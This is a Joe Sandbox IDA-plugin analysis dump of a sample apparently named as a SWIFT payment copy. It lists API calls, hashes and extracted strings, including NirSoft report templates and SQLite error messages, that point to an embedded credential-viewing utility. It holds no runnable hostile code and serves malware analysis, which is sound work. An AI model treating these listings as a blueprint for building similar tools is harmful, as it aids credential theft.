                                                                                                                                                                                                                                      • API String ID: 973020956-4135340389
                                                                                                                                                                                                                                      • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                                                                                                                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                                      • API String ID: 1283228442-2366825230
                                                                                                                                                                                                                                      • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                                                                                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004139B8
                                                                                                                                                                                                                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                                                                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413A00
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                                                                                                      • API String ID: 4173585201-1821301763
                                                                                                                                                                                                                                      • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                                                                                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                                                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                                      • API String ID: 1284135714-318151290
                                                                                                                                                                                                                                      • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                                                                                                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                                      • API String ID: 4066108131-3849865405
                                                                                                                                                                                                                                      • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                                                                                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 290601579-0
                                                                                                                                                                                                                                      • Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                                                                                                                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                                                                                                                                      • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044505E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memchrmemset
                                                                                                                                                                                                                                      • String ID: PD$PD
                                                                                                                                                                                                                                      • API String ID: 1581201632-2312785699
                                                                                                                                                                                                                                      • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                                                                                                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2163313125-0
                                                                                                                                                                                                                                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$wcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3592753638-3916222277
                                                                                                                                                                                                                                      • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                                                                                                                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                                      • String ID: %s (%s)$YV@
                                                                                                                                                                                                                                      • API String ID: 3979103747-598926743
                                                                                                                                                                                                                                      • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                                                                                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                                      • API String ID: 2780580303-317687271
                                                                                                                                                                                                                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                                      • API String ID: 2767993716-572158859
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                                      • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                                                      • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                                                      • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                                                      • out of memory, xrefs: 0042F865
                                                                                                                                                                                                                                      • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                                                      • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                       • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                                      • String ID: ($d
                                                                                                                                                                                                                                      • API String ID: 1140211610-1915259565
                                                                                                                                                                                                                                      APIs
